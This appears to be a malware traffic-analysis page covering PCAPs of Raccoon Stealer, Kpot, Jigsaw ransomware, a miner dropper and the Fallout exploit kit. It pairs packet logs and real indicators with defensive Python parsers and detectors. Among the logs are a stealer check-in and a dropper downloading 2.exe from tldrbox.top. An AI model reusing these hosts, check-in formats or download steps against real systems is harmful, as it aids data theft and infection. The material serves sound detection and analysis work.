Raccoon Stealer infection Malware svchost.exe 217.8.117.89 34.89.22.128

This is the latest sample of Raccoon, an information stealer sold as Malware-as-a-Service; a subscription costs $200 per month. Raccoon has already infected over 100,000 devices and became one of the most discussed malware families on underground forums in 2019. Each infected host checks in with a base64-encoded body, as you can see in the packets below. Decoding it yields the bot ID, the config ID and a data field:

echo "Ym90X2lkPUQ1MDE3MUYzLUIxRkQtNDFDOS1BRkJGLTNERDJGNzJDOTBCN19yeTR3biZjb25maWdfaWQ9MjE0MWRhOTJiNGFkM2FjODM3ZTAxNjc1Y2UzYTE2ODE4ODUzOTVlMCZkYXRhPW51bGw=" | base64 -d
bot_id=D50171F3-B1FD-41C9-AFBF-3DD2F72C90B7_ry4wn&config_id=2141da92b4ad3ac837e01675ce3a1681885395e0&data=null

2020-05-09 02:34:34.532063 IP 192.168.86.25.56399 > 217.8.117.89.80: Flags [P.], seq 1:398, ack 1, win 16425, […]
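To make the decoding step above repeatable over a whole capture, here is an added Python example (not code from the post, and not Raccoon's own code) that pulls the body out of a captured POST, base64-decodes it, splits the form fields and checks whether they look like a Raccoon check-in. The request line and headers wrapping the body are placeholders, as is the benign comparison body; only the base64 string is the one shown above.

```python
import base64
import binascii
import re
from typing import Dict, Optional

# Constructed sample: the base64 body quoted in the post, wrapped in a
# hypothetical POST. The path and headers are placeholders, not taken from
# the capture; only the body is the page's own string (148 characters).
SAMPLE_POST = (
    b"POST /gate HTTP/1.1\r\n"
    b"Host: 217.8.117.89\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 148\r\n"
    b"\r\n"
    b"Ym90X2lkPUQ1MDE3MUYzLUIxRkQtNDFDOS1BRkJGLTNERDJGNzJDOTBCN19yeTR3biZj"
    b"b25maWdfaWQ9MjE0MWRhOTJiNGFkM2FjODM3ZTAxNjc1Y2UzYTE2ODE4ODUzOTVlMCZk"
    b"YXRhPW51bGw="
)

# Constructed benign body for contrast: base64 of "user=alice&pw=x".
BENIGN_BODY = b"dXNlcj1hbGljZSZwdz14"

RACCOON_KEYS = {"bot_id", "config_id", "data"}
# Shape of the bot_id seen in the capture: a GUID-like value, an underscore,
# then a short alphanumeric suffix.
BOT_ID_RE = re.compile(
    r"^[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}_[A-Za-z0-9]+$"
)


def http_body(raw: bytes) -> bytes:
    """Return the body of a raw HTTP message (everything after the blank line)."""
    _, sep, body = raw.partition(b"\r\n\r\n")
    return body if sep else b""


def decode_checkin(body: bytes) -> Optional[Dict[str, str]]:
    """Base64-decode a request body and split it as key=value&key=value.

    Returns None when the body is not strict base64 or does not decode to
    printable ASCII, so callers can tell "not this format" from "no fields".
    """
    try:
        decoded = base64.b64decode(body, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None
    if not decoded.isprintable():
        return None
    fields: Dict[str, str] = {}
    for pair in decoded.split("&"):
        key, _, value = pair.partition("=")
        if key:
            fields.setdefault(key, value)
    return fields


def is_raccoon_checkin(fields: Optional[Dict[str, str]]) -> bool:
    """True when all three check-in keys are present and bot_id has the
    GUID_suffix shape observed in the capture."""
    if not fields or not RACCOON_KEYS.issubset(fields):
        return False
    return BOT_ID_RE.match(fields["bot_id"]) is not None


def analyze_request(raw: bytes) -> Dict[str, object]:
    """Decode one captured request and report whether it is a Raccoon check-in."""
    fields = decode_checkin(http_body(raw))
    return {"fields": fields, "raccoon": is_raccoon_checkin(fields)}


if __name__ == "__main__":
    print(analyze_request(SAMPLE_POST))
    print(decode_checkin(BENIGN_BODY), is_raccoon_checkin(decode_checkin(BENIGN_BODY)))
```

The strict decode (`validate=True`) matters in practice: a lenient base64 decoder will happily "decode" ordinary form data or JSON into garbage and the key check then runs on noise.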

Kpot Mikey Malware Sample PCAP File Download Traffic Analysis pollarr.top

What the Kryptik sample does, according to the sandbox's behaviour signatures:
Executable code extraction
Attempts to connect to a dead IP:Port (1 unique times)
Creates RWX memory
A process attempted to delay the analysis task.
Expresses interest in specific running processes
HTTP traffic contains suspicious features which may be indicative of malware related traffic
Performs some HTTP requests
The binary likely contains encrypted or compressed data.
Detects Sandboxie through the presence of a library
Checks for the presence of known windows from debuggers and forensic tools
Attempts to repeatedly call a single API many times in order to delay analysis time
Steals private information from local Internet […]

Jigsaw Ransomware Malware Crimeware PCAP File Download Traffic Sample

Detection names:
Avast: FileRepMetagen [Malware]
AVG: FileRepMetagen [Malware]
Avira (no cloud)
Malwarebytes: Ransom.Jigsaw
McAfee-GW-Edition: BehavesLike.Win32.Ransomware.dc
Microsoft: Trojan:Win32/Occamy.C

When executed, this ransomware has NO C2; it uses an e-mail address with directions, as pictured below. The capture does still show the host resolving service-updater.hopto.org to 41.97.11.131 and completing a TCP handshake to port 80 there, so treat that hostname and address as indicators worth checking:

2020-05-01 16:19:09.841147 IP 192.168.86.1.53 > 192.168.86.25.59527: 12228 1/0/0 A 41.97.11.131 (59) (answer for service-updater.hopto.org)
2020-05-01 16:19:09.841596 IP 192.168.86.25.50977 > 41.97.11.131.80: Flags [S], seq 1891890631, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
2020-05-01 16:19:10.021362 IP 41.97.11.131.80 > 192.168.86.25.50977: Flags [S.], seq 2051894246, ack 1891890632, win 8192, options [mss 1340,nop,wscale 8,nop,nop,sackOK], length 0
2020-05-01 16:19:10.021569 IP 192.168.86.25.50977 > 41.97.11.131.80: Flags [.], ack 1, win 16415, length 0
2020-05-01 16:19:10.022040 IP 192.168.86.25.50977 > 41.97.11.131.80: […]
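As an added example (not part of the original post), the following Python parses tcpdump summary lines like the ones above, collects DNS A-record answers and outbound SYNs, and reports every connection made to an address that had just been resolved. The sample lines are the capture lines from this post with tcpdump's raw payload bytes trimmed off; the last, truncated line is kept to show that it parses but carries no flags.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Lines from the Jigsaw capture quoted in the post, payload bytes trimmed.
SAMPLE_LINES = """\
2020-05-01 16:19:09.841147 IP 192.168.86.1.53 > 192.168.86.25.59527: 12228 1/0/0 A 41.97.11.131 (59)
2020-05-01 16:19:09.841596 IP 192.168.86.25.50977 > 41.97.11.131.80: Flags [S], seq 1891890631, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
2020-05-01 16:19:10.021362 IP 41.97.11.131.80 > 192.168.86.25.50977: Flags [S.], seq 2051894246, ack 1891890632, win 8192, options [mss 1340,nop,wscale 8,nop,nop,sackOK], length 0
2020-05-01 16:19:10.021569 IP 192.168.86.25.50977 > 41.97.11.131.80: Flags [.], ack 1, win 16415, length 0
2020-05-01 16:19:10.022040 IP 192.168.86.25.50977 > 41.97.11.131.80: […]
"""

# "<date> <time> IP <src>.<sport> > <dst>.<dport>: <rest>" (IPv4 summaries)
PKT_RE = re.compile(
    r"^(?P<ts>\S+ \S+) IP (?P<src>[\d.]+)\.(?P<sport>\d+) > "
    r"(?P<dst>[\d.]+)\.(?P<dport>\d+): (?P<rest>.*)$"
)
# A-record answers as tcpdump prints them: "... 1/0/0 A 41.97.11.131 (59)"
A_RECORD_RE = re.compile(r"\bA (\d{1,3}(?:\.\d{1,3}){3})\b")
# A bare SYN; "[S.]" (SYN-ACK) deliberately does not match.
SYN_RE = re.compile(r"Flags \[S\],")


@dataclass
class Indicators:
    resolved: Dict[str, str]                      # answer IP -> time of the DNS reply
    connections: List[Tuple[str, str, int]]       # (time, dst IP, dst port) per SYN
    resolved_then_contacted: List[Tuple[str, str, int]]


def parse_tcpdump(text: str) -> Indicators:
    """Walk tcpdump summary lines and correlate DNS answers with later SYNs."""
    resolved: Dict[str, str] = {}
    connections: List[Tuple[str, str, int]] = []
    for line in text.splitlines():
        m = PKT_RE.match(line)
        if not m:
            continue  # not a packet summary line (e.g. a payload dump line)
        rest = m["rest"]
        if m["sport"] == "53":
            # a DNS reply: remember every A record it carries
            for ip in A_RECORD_RE.findall(rest):
                resolved.setdefault(ip, m["ts"])
        elif SYN_RE.search(rest):
            connections.append((m["ts"], m["dst"], int(m["dport"])))
    hits = [c for c in connections if c[1] in resolved]
    return Indicators(resolved, connections, hits)


if __name__ == "__main__":
    ind = parse_tcpdump(SAMPLE_LINES)
    for ts, ip, port in ind.resolved_then_contacted:
        print(f"{ts} connected to {ip}:{port}, resolved at {ind.resolved[ip]}")
```

Without `-v`, tcpdump does not print the queried name on the reply line, so pair this with the query line (or run with `-v`) when you need the hostname rather than just the address.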

Malware Dropper tldrbox.top Loads Crypto Currency Miner PCAP Download Traffic Sample

The dropper retrieves its payload, 2.exe, over plain HTTP from tldrbox.top (93.126.60.109); note the browser-style Accept header on a request for an executable:

2020-04-13 00:28:49.420813 IP 192.168.86.25.52831 > 93.126.60.109.80: Flags [P.], seq 1:391, ack 1, win 16500, length 390: HTTP: GET /2.exe HTTP/1.1
GET /2.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: tldrbox.top
Connection: Keep-Alive

2020-04-13 00:28:49.623505 IP 93.126.60.109.80 > 192.168.86.25.52831: Flags [.], ack 391, win 237, length 0
… IP 93.126.60.109.80 > 192.168.86.25.52831: Flags [.], seq 1:1201, ack 391, win 237, length 1200: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Mon, 13 Apr 2020 04:29:15 GMT
Content-Type: application/octet-stream
Content-Length: 556032
Last-Modified: Wed, 08 Apr 2020 02:44:48 GMT
Connection: keep-alive
ETag: […]
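An added example, not the post's own code, showing the checks an analyst would script over this exchange: it parses the request and response headers quoted above and returns the signals that mark the pair as an executable download. The response body and ETag are not on the page, so the body below is a constructed stand-in that begins with a PE "MZ" header; the benign image request used for contrast is also constructed.

```python
import re
from typing import Dict, List, Tuple

# Headers from the tldrbox.top exchange quoted in the post, re-joined with
# CRLF. The body is a constructed stand-in (the real one is not on the page).
REQUEST = (
    b"GET /2.exe HTTP/1.1\r\n"
    b"Accept: image/jpeg, application/x-ms-application, image/gif, "
    b"application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*\r\n"
    b"Accept-Language: en-US\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; "
    b"SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)\r\n"
    b"Accept-Encoding: gzip, deflate\r\n"
    b"Host: tldrbox.top\r\n"
    b"Connection: Keep-Alive\r\n"
    b"\r\n"
)
RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: nginx/1.16.1\r\n"
    b"Date: Mon, 13 Apr 2020 04:29:15 GMT\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"Content-Length: 556032\r\n"
    b"Last-Modified: Wed, 08 Apr 2020 02:44:48 GMT\r\n"
    b"Connection: keep-alive\r\n"
    b"\r\n"
    b"MZ\x90\x00\x03\x00\x00\x00"  # constructed: first bytes of a PE file
)

# Constructed benign pair: an image fetched by a page, with a Referer.
BENIGN_REQUEST = (
    b"GET /static/logo.png HTTP/1.1\r\n"
    b"Host: example.org\r\n"
    b"Referer: http://example.org/\r\n"
    b"Accept: image/png,image/*;q=0.8,*/*;q=0.5\r\n"
    b"\r\n"
)
BENIGN_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: image/png\r\n"
    b"Content-Length: 8\r\n"
    b"\r\n"
    b"\x89PNG\r\n\x1a\n"
)

EXE_PATH_RE = re.compile(r"\.(?:exe|dll|scr|msi)(?:\?|$)", re.IGNORECASE)
BINARY_TYPES = {"application/octet-stream", "application/x-msdownload",
                "application/x-dosexec"}
LEGACY_IE_RE = re.compile(r"MSIE [678]\.0")


def parse_http(raw: bytes) -> Tuple[str, Dict[str, str], bytes]:
    """Split a raw HTTP message into (start line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def executable_download_reasons(request: bytes, response: bytes) -> List[str]:
    """Return the signals that make a request/response pair look like an
    executable being dropped; an empty list means nothing fired."""
    req_line, req_h, _ = parse_http(request)
    _, resp_h, body = parse_http(response)
    parts = req_line.split(" ")
    path = parts[1] if len(parts) > 1 else ""
    exe_path = EXE_PATH_RE.search(path) is not None
    pe_body = body[:2] == b"MZ"
    reasons: List[str] = []
    if exe_path:
        reasons.append(f"path {path} names an executable")
    ctype = resp_h.get("content-type", "").split(";")[0].strip().lower()
    if ctype in BINARY_TYPES:
        reasons.append(f"binary content-type {ctype}")
    if pe_body:
        reasons.append("body starts with MZ (PE header)")
    if (exe_path or pe_body) and "referer" not in req_h:
        reasons.append("executable fetched with no Referer (direct or scripted request)")
    # Weak on its own, but a stale IE User-Agent in 2020 traffic is worth a look.
    if LEGACY_IE_RE.search(req_h.get("user-agent", "")):
        reasons.append("legacy IE User-Agent")
    return reasons


if __name__ == "__main__":
    for r in executable_download_reasons(REQUEST, RESPONSE):
        print("-", r)
    print("benign:", executable_download_reasons(BENIGN_REQUEST, BENIGN_RESPONSE))
```

The MZ check is the one that survives renamed paths and lying Content-Type headers, which is why it needs the first bytes of the body rather than just the headers; in a real capture take them from the reassembled stream, not from a single segment.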

Fallout Exploit Kit Raccoon Stealer CVE-2018-4878 CVE-2018-15982 CVE-2018-8174 Raccoon Stealer Malware PCAP Download Traffic Sample

Fallout Exploit Kit is back and, as of 4-8-2020, targets the following vulnerabilities:
CVE-2018-4878 (Adobe Flash Player)
CVE-2018-15982 (Adobe Flash Player)
CVE-2018-8174 (Windows VBScript engine, reached through Internet Explorer)

Fallout has been observed in the wild delivering the following payloads:
Stop – Ransomware
GandCrab 5 – Ransomware
Kraken Cryptor – Ransomware
GandCrab – Ransomware
Maze – Ransomware
Fake Globe – Ransomware
Minotaur – Ransomware
Matrix – Ransomware
Sodinokibi – Ransomware
Raccoon Stealer – this sample

Raccoon Stealer (also known as Legion, Mohazo, and Racealer) is an information-stealing trojan that installs itself quietly and collects personal information from the infected host.

2020-02-24 19:34:02.651895 IP […]
